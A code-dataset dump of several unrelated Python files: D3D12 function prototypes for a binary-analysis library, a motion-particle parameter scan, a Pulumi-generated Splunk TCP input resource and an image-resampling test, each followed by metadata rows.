SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Num32BitValues": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_CONSTANTS", pack=False, align=None), "Descriptor": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_DESCRIPTOR_FLAGS")}, name="D3D12_ROOT_DESCRIPTOR1", pack=False, align=None)}, name="<anon>", label="None"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_ROOT_PARAMETER1", pack=False, align=None), offset=0), "NumStaticSamplers": SimTypeInt(signed=False, label="UInt32"), "pStaticSamplers": SimTypePointer(SimStruct({"Filter": SimTypeInt(signed=False, label="D3D12_FILTER"), "AddressU": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressV": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressW": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "MipLODBias": SimTypeFloat(size=32), "MaxAnisotropy": SimTypeInt(signed=False, label="UInt32"), "ComparisonFunc": SimTypeInt(signed=False, label="D3D12_COMPARISON_FUNC"), "BorderColor": SimTypeInt(signed=False, label="D3D12_STATIC_BORDER_COLOR"), "MinLOD": SimTypeFloat(size=32), "MaxLOD": SimTypeFloat(size=32), "ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_STATIC_SAMPLER_DESC", pack=False, align=None), offset=0), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_SIGNATURE_FLAGS")}, name="D3D12_ROOT_SIGNATURE_DESC1", pack=False, align=None)}, name="<anon>", label="None")}, name="D3D12_VERSIONED_ROOT_SIGNATURE_DESC", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pRootSignature", "ppBlob", "ppErrorBlob"]),
#
'D3D12CreateVersionedRootSignatureDeserializer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSrcData", "SrcDataSizeInBytes", "pRootSignatureDeserializerInterface", "ppRootSignatureDeserializer"]),
#
'D3D12CreateDevice': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypeInt(signed=False, label="D3D_FEATURE_LEVEL"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAdapter", "MinimumFeatureLevel", "riid", "ppDevice"]),
#
'D3D12GetDebugInterface': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "ppvDebug"]),
#
'D3D12EnableExperimentalFeatures': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="Void"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["NumFeatures", "pIIDs", "pConfigurationStructs", "pConfigurationStructSizes"]),
}
lib.set_prototypes(prototypes)
| 321.888889 | 5,801 | 0.77399 | 1,228 | 11,588 | 7.15798 | 0.121336 | 0.171104 | 0.20785 | 0.257338 | 0.863709 | 0.848919 | 0.848919 | 0.841411 | 0.82628 | 0.80603 | 0 | 0.035354 | 0.060235 | 11,588 | 35 | 5,802 | 331.085714 | 0.771809 | 0.002416 | 0 | 0 | 0 | 0 | 0.339051 | 0.150468 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.238095 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
fab5ada4b7bfa41c92d9d69f7557645f20fa4296 | 153 | py | Python | Models/common/__init__.py | akanimax/toxic-comment-identification-tensorflow | a1d065639d8b518c0ac1dc53e98e09642e258bb6 | [
"MIT"
] | null | null | null | Models/common/__init__.py | akanimax/toxic-comment-identification-tensorflow | a1d065639d8b518c0ac1dc53e98e09642e258bb6 | [
"MIT"
] | null | null | null | Models/common/__init__.py | akanimax/toxic-comment-identification-tensorflow | a1d065639d8b518c0ac1dc53e98e09642e258bb6 | [
"MIT"
] | null | null | null | """ The module that is going to be needed by all the subsequent models trained
"""
from __future__ import print_function
from __future__ import division | 30.6 | 78 | 0.803922 | 23 | 153 | 4.956522 | 0.826087 | 0.175439 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156863 | 153 | 5 | 79 | 30.6 | 0.883721 | 0.48366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
35823af34b69a33da7451a84be90419584af8364 | 91 | py | Python | WrightSim/hamiltonian/__init__.py | wright-group/WrightSim | acd9566ccb3e98715e63d3dc03a5ae502fe4a3d1 | [
"MIT"
] | 3 | 2017-07-16T16:40:40.000Z | 2020-09-02T13:58:51.000Z | WrightSim/hamiltonian/__init__.py | wright-group/WrightSim | acd9566ccb3e98715e63d3dc03a5ae502fe4a3d1 | [
"MIT"
] | 35 | 2016-11-10T22:22:28.000Z | 2021-09-07T18:36:37.000Z | WrightSim/hamiltonian/__init__.py | wright-group/WrightSim | acd9566ccb3e98715e63d3dc03a5ae502fe4a3d1 | [
"MIT"
] | 1 | 2021-09-18T01:40:37.000Z | 2021-09-18T01:40:37.000Z | from .default import Hamiltonian
from .TRSF_default import Hamiltonian as Hamiltonian_TRSF
| 30.333333 | 57 | 0.868132 | 12 | 91 | 6.416667 | 0.5 | 0.337662 | 0.623377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10989 | 91 | 2 | 58 | 45.5 | 0.950617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3588bcfd8d7cd283919dcedfac7cd30996e39bb7 | 5,065 | py | Python | scripts/experiment_SI_controls.py | laurentperrinet/KhoeiMassonPerrinet_2017_PLoSCB | 1971e39d6dc980d5bd0d52f76400e3f2d33c3160 | [
"MIT"
] | 3 | 2018-12-11T13:50:33.000Z | 2020-05-08T11:54:24.000Z | scripts/experiment_SI_controls.py | laurentperrinet/KhoeiMassonPerrinet_2017_PLoSCB | 1971e39d6dc980d5bd0d52f76400e3f2d33c3160 | [
"MIT"
] | null | null | null | scripts/experiment_SI_controls.py | laurentperrinet/KhoeiMassonPerrinet_2017_PLoSCB | 1971e39d6dc980d5bd0d52f76400e3f2d33c3160 | [
"MIT"
] | 3 | 2020-05-21T19:28:07.000Z | 2022-03-10T20:27:01.000Z | """
A bunch of control runs
"""
import MotionParticlesFLE as mp
gen_dot = mp.generate_dot
import numpy as np
import os
from default_param import *
image = {}
experiment = 'SI'
N_scan = 5
base = 10.
#mp.N_trials = 4
for stimulus_tag, im_arg in zip(stim_labels, stim_args):
#for stimulus_tag, im_arg in zip(stim_labels[1], stim_args[1]):
#for D_x, D_V, label in zip([mp.D_x, PBP_D_x], [mp.D_V, PBP_D_V], ['MBP', 'PBP']):
for D_x, D_V, label in zip([mp.D_x], [mp.D_V], ['MBP']):
im_arg.update(D_V=D_V, D_x=D_x)
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
D_x=im_arg['D_x']*np.logspace(-2, 2, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
D_V=im_arg['D_V']*np.logspace(-2, 2, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
sigma_motion=mp.sigma_motion*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
K_motion=mp.K_motion*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
dot_size=im_arg['dot_size']*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
sigma_I=mp.sigma_I*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
im_noise=mp.im_noise*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
sigma_noise=mp.sigma_noise*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
p_epsilon=mp.p_epsilon*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
v_init=mp.v_init*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
v_prior=np.logspace(-.3, 5., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
resample=np.linspace(0.1, 1., N_scan, endpoint=True))
| 53.882979 | 137 | 0.609674 | 825 | 5,065 | 3.34303 | 0.093333 | 0.104424 | 0.08702 | 0.069616 | 0.862944 | 0.859318 | 0.859318 | 0.859318 | 0.859318 | 0.834663 | 0 | 0.00824 | 0.257256 | 5,065 | 93 | 138 | 54.462366 | 0.72488 | 0.035933 | 0 | 0.666667 | 1 | 0 | 0.008826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3588ee2e72faee0ff9dbaf6e705ae4ebaa8872f4 | 18,914 | py | Python | sdk/python/pulumi_splunk/inputs_tcp_cooked.py | pulumi/pulumi-splunk | a593a4b65e7de94d61b93676231606820193f212 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-12-23T01:26:49.000Z | 2020-12-23T01:26:49.000Z | sdk/python/pulumi_splunk/inputs_tcp_cooked.py | pulumi/pulumi-splunk | a593a4b65e7de94d61b93676231606820193f212 | [
"ECL-2.0",
"Apache-2.0"
] | 36 | 2020-12-22T16:57:47.000Z | 2022-03-25T20:12:26.000Z | sdk/python/pulumi_splunk/inputs_tcp_cooked.py | pulumi/pulumi-splunk | a593a4b65e7de94d61b93676231606820193f212 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['InputsTcpCookedArgs', 'InputsTcpCooked']
@pulumi.input_type
class InputsTcpCookedArgs:
def __init__(__self__, *,
acl: Optional[pulumi.Input['InputsTcpCookedAclArgs']] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a InputsTcpCooked resource.
:param pulumi.Input['InputsTcpCookedAclArgs'] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
if acl is not None:
pulumi.set(__self__, "acl", acl)
if connection_host is not None:
pulumi.set(__self__, "connection_host", connection_host)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if restrict_to_host is not None:
pulumi.set(__self__, "restrict_to_host", restrict_to_host)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input['InputsTcpCookedAclArgs']]:
"""
The app/user context that is the namespace for the resource
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input['InputsTcpCookedAclArgs']]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter(name="connectionHost")
def connection_host(self) -> Optional[pulumi.Input[str]]:
"""
Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
"""
return pulumi.get(self, "connection_host")
@connection_host.setter
def connection_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_host", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if input is disabled.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host from which the indexer gets data.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The port number of this input.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="restrictToHost")
def restrict_to_host(self) -> Optional[pulumi.Input[str]]:
"""
Restrict incoming connections on this port to the host specified here.
"""
return pulumi.get(self, "restrict_to_host")
@restrict_to_host.setter
def restrict_to_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restrict_to_host", value)
@pulumi.input_type
class _InputsTcpCookedState:
def __init__(__self__, *,
acl: Optional[pulumi.Input['InputsTcpCookedAclArgs']] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering InputsTcpCooked resources.
:param pulumi.Input['InputsTcpCookedAclArgs'] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
if acl is not None:
pulumi.set(__self__, "acl", acl)
if connection_host is not None:
pulumi.set(__self__, "connection_host", connection_host)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if restrict_to_host is not None:
pulumi.set(__self__, "restrict_to_host", restrict_to_host)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input['InputsTcpCookedAclArgs']]:
"""
The app/user context that is the namespace for the resource
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input['InputsTcpCookedAclArgs']]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter(name="connectionHost")
def connection_host(self) -> Optional[pulumi.Input[str]]:
"""
Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
"""
return pulumi.get(self, "connection_host")
@connection_host.setter
def connection_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_host", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if input is disabled.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host from which the indexer gets data.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The port number of this input.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="restrictToHost")
def restrict_to_host(self) -> Optional[pulumi.Input[str]]:
"""
Restrict incoming connections on this port to the host specified here.
"""
return pulumi.get(self, "restrict_to_host")
@restrict_to_host.setter
def restrict_to_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restrict_to_host", value)
class InputsTcpCooked(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']]] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## # Resource: InputsTcpCooked
Create or update cooked TCP input information and create new containers for managing cooked data.
## Example Usage
```python
import pulumi
import pulumi_splunk as splunk
tcp_cooked = splunk.InputsTcpCooked("tcpCooked",
connection_host="dns",
disabled=False,
restrict_to_host="splunk")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[InputsTcpCookedArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## # Resource: InputsTcpCooked
Create or update cooked TCP input information and create new containers for managing cooked data.
## Example Usage
```python
import pulumi
import pulumi_splunk as splunk
tcp_cooked = splunk.InputsTcpCooked("tcpCooked",
connection_host="dns",
disabled=False,
restrict_to_host="splunk")
```
:param str resource_name: The name of the resource.
:param InputsTcpCookedArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InputsTcpCookedArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']]] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InputsTcpCookedArgs.__new__(InputsTcpCookedArgs)
__props__.__dict__["acl"] = acl
__props__.__dict__["connection_host"] = connection_host
__props__.__dict__["disabled"] = disabled
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["restrict_to_host"] = restrict_to_host
super(InputsTcpCooked, __self__).__init__(
'splunk:index/inputsTcpCooked:InputsTcpCooked',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']]] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None) -> 'InputsTcpCooked':
"""
Get an existing InputsTcpCooked resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InputsTcpCookedState.__new__(_InputsTcpCookedState)
__props__.__dict__["acl"] = acl
__props__.__dict__["connection_host"] = connection_host
__props__.__dict__["disabled"] = disabled
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["restrict_to_host"] = restrict_to_host
return InputsTcpCooked(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def acl(self) -> pulumi.Output['outputs.InputsTcpCookedAcl']:
"""
The app/user context that is the namespace for the resource
"""
return pulumi.get(self, "acl")
@property
@pulumi.getter(name="connectionHost")
def connection_host(self) -> pulumi.Output[str]:
"""
Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
"""
return pulumi.get(self, "connection_host")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[bool]:
"""
Indicates if input is disabled.
"""
return pulumi.get(self, "disabled")
@property
@pulumi.getter
def host(self) -> pulumi.Output[str]:
"""
Host from which the indexer gets data.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The port number of this input.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="restrictToHost")
def restrict_to_host(self) -> pulumi.Output[str]:
"""
Restrict incoming connections on this port to the host specified here.
"""
return pulumi.get(self, "restrict_to_host")
| 42.21875 | 136 | 0.636143 | 2,275 | 18,914 | 5.116044 | 0.07956 | 0.077498 | 0.088152 | 0.068047 | 0.851104 | 0.836068 | 0.825157 | 0.818369 | 0.813987 | 0.808918 | 0 | 0.000073 | 0.271333 | 18,914 | 447 | 137 | 42.313199 | 0.844435 | 0.371629 | 0 | 0.793991 | 1 | 0 | 0.094666 | 0.025169 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158798 | false | 0.004292 | 0.030043 | 0 | 0.283262 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
35cbe6d621300ceb182c72babda7fd927adccf6e | 3,314 | py | Python | tests/test_resample.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | [
"BSD-3-Clause"
] | 1 | 2021-01-15T15:32:19.000Z | 2021-01-15T15:32:19.000Z | tests/test_resample.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | [
"BSD-3-Clause"
] | null | null | null | tests/test_resample.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | [
"BSD-3-Clause"
] | null | null | null | import pyclesperanto_prototype as cle
import numpy as np
def test_resample_downsample_2d():
test1 = cle.push(np.asarray([
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
]))
reference = cle.push(np.asarray([
[0, 2],
[1, 4]
]))
result = cle.resample(test1, factor_x=0.5, factor_y=0.5)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
assert (np.array_equal(a, b))
